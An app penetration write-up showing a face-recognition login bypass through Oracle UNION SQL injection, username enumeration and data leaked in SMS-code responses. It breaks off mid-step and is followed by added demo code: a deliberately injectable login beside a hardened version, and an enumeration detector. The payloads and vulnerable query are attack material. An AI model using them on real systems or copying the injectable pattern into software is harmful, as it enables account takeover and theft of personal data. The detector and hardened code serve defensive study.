
Title: App Penetration - Face Recognition Login Bypass


1. Capturing APP traffic and reversing the encryption algorithm

Opening the APP shows a login box.


After capturing the packet, the parameters turned out to be encrypted.


Decompiling with Jadx showed that the source had neither packing nor obfuscation. Very lucky.


Following the usual approach, first search for keywords such as Encrypt and Decrypt; this turned up an encryptData function in Common.js.


Going to that location, a complete set of encryption and decryption routines is written and placed there.


Pasting it into the browser console to debug confirms that it works.


2. Finding the injection point

First, test for injection.

Plain text: {'userName':'TEST'','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUF DbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWvBHMR1EbXJVc4VUZw0EbUBXOtFmSWh1TYZUbltEasdFW1ATTpxmMkBHbwE2cKpWW1okVilGatNFc5UVYWRGMZFTSW1kaa52UEhXVhplUsR1dwsWYOhGWTBXOVFmUxITWyI1VNpGcuJFSOdVYzw2VTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: App returns an exception

Plain text: {'userName':'TEST''','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: JdFMQJVRDlmQ2l3ahJlWXFmaox2VxAXVhBFbH5UeJd0YPVjMZNHcsJmSOh1UUFzalJlUxQ1MxsWZOxGWRFXNr1kRSxGV5NWbhpkWUNFVGdkY4NmVZBHZYFmSa52VZZUbNtEbyQFcGZlYphWbTVHbWF2Msd1UWhWbl5kVUJVcaZVY2B3VTpnWxIVYahVT0xGMjpkTWRFc50WYKhXbRllVXZVMjZVW1xmeSlGbyQGcsVUTCB3RU lXRrFWTkh1Uxx2aOpEbtllM41WTqxmbWRnWxQ2QoZ1VwRGWhpEaI5EVxUFZWB3VTJzaVFWaahkY510VldVMtZlNsRlYK5EWTREcGNWNwITWyZleWpFbyIWcsVkYDhmVaZVNw0UasJDZwx2aNZlUrRlNsVkVOxmMiFHbwE2SOpWWZVDMNpGatFVdsBzYKxmbTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: App returns normally

Plain text: {'userName':'TEST'or'1'='1','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: k0VwAlUFNUaCZXerFWRspFcOd0VhZlbTBXOVFGMJpWW3VzaipGetdVdsBzYK5kVUZjRGZFUkhFV2ETVlJEctRVeVVkVPpkeaFHbr5kSOZVWzZkeWhGbyQGcstGZhhmVZl3bVFGUsdVV0p0RhtUNXdFckhVYKZlRhZTMV5kRw1mVwlTbhpkTuZFSwxGZ4BzVTpHbwUlTsJjYxxWRiNEaWplVWpnVoVzVPhkSXF2Msd1U3V0ah1kSUFVc4B DZKB3VTJzaVFWaahkY510VldVMtZ1MKV0VaxmMkBHbFVGMNZFVxYFbhpkWUNFcK1GZzpkeZVjWWJ2Vwh1T0xGMjpkTrd1dsRlYqR3VOhFbWFmdwd1UzpURXxmVsRleJdVYzw2VTlXVGJ1Twh1UVFTVhZHcXNlcwBTTphGbUpXTHF2Q1c1U6xWVltEb6lFVxsmYK5kaZVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: App returns normally

At this point it can be concluded that the login point is injectable, but the response is always "the username or password is wrong", which means that ' or '1'='1 on its own does not get past it.


Based on the returned results, the backend login logic may look like this (pseudocode):

userInfo = "select * from userinfo where username='" + userName + "'";  // user input concatenated into the query
userPass = userInfo.password;                                             // password taken from whatever row came back
if (userPass == password) {
    return 'Login success';
} else {
    return 'Login failed';
}

Constructing a universal password through UNION injection can then log in as any user. The test process is as follows.

First use order by to test; the number of fields is 9. Then construct the payload.

# Since the target server has filtering, the payload here is a simple bypass

Plain text: {'userName':'TEST'union/**/select/**/null,null,null,null,null,null,null,null,null,null,null from dual-- ','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: JdFMQJ VRDlmQ2l3ahFkaipkTqZFdKdVY2B3VTFDb6ZFaw52UZBHbNtkTFRFcWtWZOJkehVUMrVmTwdFVzwGbh9EaYZVc1UkTKxmMUBHdyYVYShkY0xGMjpEbulVe3dlYrxmMiFHbwEWMjZ1V1AXVipkTYNFRaZkTOJVMURDbGJmSaR1UEp0RiNlSqlFMwBTUNx2VSFHbr5kSOx2Vzg3RTdlVIJWevxGZ0E zVTpHbwE1TkhkTwVDMkBTTVRVNsVVYQx2ROlXSHN2T1ITWzBHbSpGZuJFdsBzYK5kVUFjVrFWTGR1UwlTVhBTSql1d1smYqhXbXXTtR2SOVEVwZUMWhmWuNVSwZFZHFzVTJzawUVYkhkYJpFblVDMXNlesVVYPZEVVZTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkJkTrl1baZ 0UhR2RNlXSXVWYkV1U6h2MWtmVIVGRKJzYXVTbZpHZzIVaGRlTIhHMjRDZGpVMoNTUp5kbWVnSyM2MktWW4VleS1kTIVGWSdFZ040aZpnWsJWaONDZIp0VNFTSERFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: App returns success

Since Oracle also checks the column data types in a UNION query, the corresponding column types must be tested as well. The final result is as follows:

# Note that I modified the password to 123 here to test whether the universal password constructed via UNION is feasible

Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123',1 from dual-- ','passWord':'123','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: QSXBDUSV0 QpJkd5tWYB1UdsBTTXFTbZBXOtFmSWh1TYZUbltEasdVevBTUNx2VSZTMF1kcSVFV2Ezah5EZYdVc1UUZWBXbUBzaVFGUsJTYYBnRkNXMXNlesVVZppERiRnUXFmdwd1UyZleWpFbuNFdsBzYK50aWBDMFZFUoh1Vzx2aOpkTrl1cKxWTpJlbTREeVFmRwd1UysGMVFGZIJWSaZFZzpkaXJDaYJm SOh1UEVDMkBzatR1MSpXUOxGWTBXOVFGMJpWW3VzaipGetd1ROJDZHFzVTpHbwUlTWhlUxhXVNpEbyQFcSpWTpJkbUVnTHJWYGpXWyAHMR1EbXVFWG1GZLh2aXFjWVJmSaR1UUBXMkNHarZlNsRlYK5EWTVTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkNDZWdFeJFjUKJFWPR nTXJ2QOZFV650Vl5EbYJlNwBzYqxGWUVjVrV2SONTW1ETVlZEcuNleOdVZOxGWSZDcwMmashFV1Y1altkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: The prompt is "weak password" (indicating that this method is feasible)

Next, change one field at a time to determine which column corresponds to the password field. The test results are as follows:

# Note that I changed the password to Ceshi123@@@, which is no longer a weak password

Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','Ceshi123@@@','123','123','123','123','123','123',1 from dual-- ','passWord':'Ceshi123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext: k0VwAlUFNUaCZXerFWUPtEbIp1cWRlYKpFVTBnStR2cKpXW1olVitGbyQGcsVUZOJ1aUFTRrVmTwh1UFFzaNplUWRFerZkUQxmMiFHbFN2VkxWW3BHMR1EbH9EdSd0YhVzVTJzawEVYW5mU050VhtkTFRFcGxmUQB3MhVVMwY1S sJDVwR2MWFGdX9EWKdVYzw2VTRDbVFGUsdlVI50VONFetl1dS1WTp5kbTREeVFmUSVFVxwmRS5kVYFVcxUVY2B3VTFDb6ZFaw52UZBXMWNEawk1bwBTUNx2VSFHeFVGMNxGVwlTbhpkVY9EWG1WZLhGbXhVNw0UasJDZwxGMhNnSqlV NKZlYphWbTBXOVFmVkBTWxkkVNpmWuNFR4VVYCZVVVJUNrFmToNTYIZUbldlSUVFc50WYKRXbTpXSHd1TOpXWvp0aipkTYNFRsVEZ310aZ9mWGNVYkdUT5l0VlFGZVNFNkhVZLBHWTVVMrJ2Ms52U2wWRW5UNyQWNwtWZKJlVUVHZYV 2Swh1UVFzaiNDbuNlQKVlUSBHWTVVMFN2bKpXWzVTRNtkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW

Result: The prompt says login successful

After the bypass, I found that the program threw an exception.

Looking carefully at the returned data, it includes username, staffId (employee number), email, staffName (name), tel (mobile number), and mobile (mobile number). However, these values were just ones I constructed myself; real user information is needed for the subsequent login flow.

Fortunately, there is still a place to obtain real user information.

3. Enumerating usernames via the forgot-password function

The app also has a forgot-password function (usernames can usually be enumerated here).

The forgot-password function can be used to determine whether a username exists. Here I just ran a dictionary through it and many usernames came out.

4. Cracking the SMS verification code

Naturally, use these usernames to log in via SMS verification code.

Request the verification code, then decrypt the response packet; surprisingly, it returns the user's basic information.

Retest the login payload based on this, and the final result is as follows:

Plain text: {'userName':'TEST\'union/**/select/**/staffId,\'Qwe123@@@\',\'userName\',\'Qwe123@@@\',\'mobile\',\'mobile\',\'email\',\'865166023309431\',staffId from dual -- ','passWord':'Qwe123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Ciphertext:
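As an added example (not code from the original post or from the tested app): the backend login logic the post infers in section 2, reproduced against an in-memory SQLite database, next to a hardened version that uses a parameterised query and a salted password hash. Everything in it is constructed: the table names, the sample account alice/s3cret, and a one-row dual table standing in for Oracle's DUAL, which SQLite lacks. The payload string mirrors the shape used in section 2 (close the quote, UNION a row whose password column is attacker-chosen), reduced to three columns to match the demo table.

```python
"""Added example: the login logic inferred in the post, vulnerable and hardened.

Not code from the original post. Table names, the sample account and the
one-row `dual` stand-in for Oracle's DUAL are all constructed for the demo.
"""
import hashlib
import hmac
import os
import sqlite3

# Constructed sample account; the vulnerable table keeps the password in clear,
# as the inferred logic (userInfo.password == password) implies.
REAL_USER = "alice"
REAL_PASSWORD = "s3cret"
PBKDF2_ROUNDS = 100_000


def make_db() -> sqlite3.Connection:
    """Build the demo schema: a clear-text table, a hashed table and a DUAL stand-in."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO userinfo VALUES (1, ?, ?)", (REAL_USER, REAL_PASSWORD))
    conn.execute("CREATE TABLE dual (dummy TEXT)")  # stand-in for Oracle's DUAL
    conn.execute("INSERT INTO dual VALUES ('X')")
    # Hardened table: per-user salt and PBKDF2 digest instead of the clear password.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", REAL_PASSWORD.encode(), salt, PBKDF2_ROUNDS)
    conn.execute("CREATE TABLE userinfo_hashed (id INTEGER, username TEXT, salt BLOB, digest BLOB)")
    conn.execute("INSERT INTO userinfo_hashed VALUES (1, ?, ?, ?)", (REAL_USER, salt, digest))
    return conn


def login_vulnerable(conn: sqlite3.Connection, user_name: str, password: str) -> str:
    """Concatenated query: whichever row the statement yields, including a
    UNION-injected one, supplies the password the server compares against."""
    sql = "select * from userinfo where username='" + user_name + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "Login failed"
    return "Login success" if row[2] == password else "Login failed"


def login_hardened(conn: sqlite3.Connection, user_name: str, password: str) -> str:
    """Parameterised lookup, so input can never alter the statement, and a
    salted hash compared in constant time instead of a clear-text equality."""
    row = conn.execute(
        "select salt, digest from userinfo_hashed where username=?", (user_name,)
    ).fetchone()
    if row is None:
        return "Login failed"
    salt, stored = row
    computed = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "Login success" if hmac.compare_digest(computed, stored) else "Login failed"


# Payload shape from the post (quote closed, UNION row with a chosen password,
# /**/ in place of spaces), cut down to the demo table's three columns.
UNION_PAYLOAD = "TEST'union/**/select/**/1,'123','123' from dual-- "
OR_PAYLOAD = "TEST' or '1'='1"


def demo() -> dict:
    """Run the three cases the post walks through against both implementations."""
    conn = make_db()
    return {
        "vuln_or_1=1": login_vulnerable(conn, OR_PAYLOAD, "123456"),      # real row, wrong password
        "vuln_union": login_vulnerable(conn, UNION_PAYLOAD, "123"),      # injected row wins
        "hard_union": login_hardened(conn, UNION_PAYLOAD, "123"),        # no such username
        "hard_real": login_hardened(conn, REAL_USER, REAL_PASSWORD),     # normal login still works
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:12s} -> {outcome}")
```

Running it reproduces the behaviour the post describes: ' or '1'='1 alone yields "Login failed" in the inferred logic because the real row comes back and its password does not match, while the UNION row succeeds against the concatenated query and fails against the parameterised one. Storing only a salted digest is the second layer: even a row that somehow reached the comparison would have to carry a valid salt and PBKDF2 digest rather than a chosen clear-text value.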
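A second added example (again not from the original post), for the username enumeration in section 3: a detection that reads forgot-password request logs and flags a source that probes many distinct usernames in a short window with mostly "not found" responses. The log format, the field names and the thresholds are assumptions, and the sample lines are constructed.

```python
"""Added example: spotting username enumeration on a forgot-password endpoint.

Not from the original post. The log line format, the status values and the
thresholds are assumed; the sample lines are constructed for the demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed access-log shape: ISO timestamp, client IP, path, username, outcome.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) /forgotPassword user=(?P<user>\S+) status=(?P<status>\S+)$"
)

# Constructed sample: 10.0.0.9 walks a wordlist; 10.0.0.5 and 10.0.0.7 are ordinary users.
SAMPLE_LOG = [
    "2020-06-04T10:00:01 10.0.0.5 /forgotPassword user=alice status=sent",
    "2020-06-04T10:00:02 10.0.0.9 /forgotPassword user=u0001 status=notfound",
    "2020-06-04T10:00:02 10.0.0.9 /forgotPassword user=u0002 status=notfound",
    "2020-06-04T10:00:03 10.0.0.9 /forgotPassword user=u0003 status=notfound",
    "2020-06-04T10:00:03 10.0.0.9 /forgotPassword user=bob status=sent",
    "2020-06-04T10:00:04 10.0.0.9 /forgotPassword user=u0004 status=notfound",
    "2020-06-04T10:00:05 10.0.0.9 /forgotPassword user=u0005 status=notfound",
    "2020-06-04T10:09:00 10.0.0.5 /forgotPassword user=alice status=sent",
    "2020-06-04T10:09:30 10.0.0.7 /forgotPassword user=carol status=notfound",
]


def parse_line(line: str):
    """Return (timestamp, ip, user, status) or None for a line that does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["status"])


def detect_enumeration(lines, window=timedelta(minutes=1),
                       min_distinct=5, min_notfound_ratio=0.6) -> dict:
    """Sliding window per source IP: flag an IP when, within `window`, it names at
    least `min_distinct` different usernames and most of them are unknown.
    Returns {ip: largest distinct-username count seen in any window}."""
    by_ip = defaultdict(list)
    for line in lines:
        event = parse_line(line)
        if event:
            by_ip[event[1]].append(event)

    alerts = {}
    for ip, events in by_ip.items():
        events.sort()  # chronological; tuples sort by timestamp first
        for i, (start, _, _, _) in enumerate(events):
            users, total, notfound = set(), 0, 0
            for ts, _, user, status in events[i:]:
                if ts - start > window:
                    break
                users.add(user)
                total += 1
                notfound += status == "notfound"
            if len(users) >= min_distinct and notfound / total >= min_notfound_ratio:
                alerts[ip] = max(alerts.get(ip, 0), len(users))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: {count} distinct usernames in one window")
```

The ratio check is what separates a wordlist run from a single user mistyping their own name a few times; pairing it with a uniform "if the account exists, a message has been sent" response and per-source rate limiting on the endpoint removes the oracle the post relied on.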
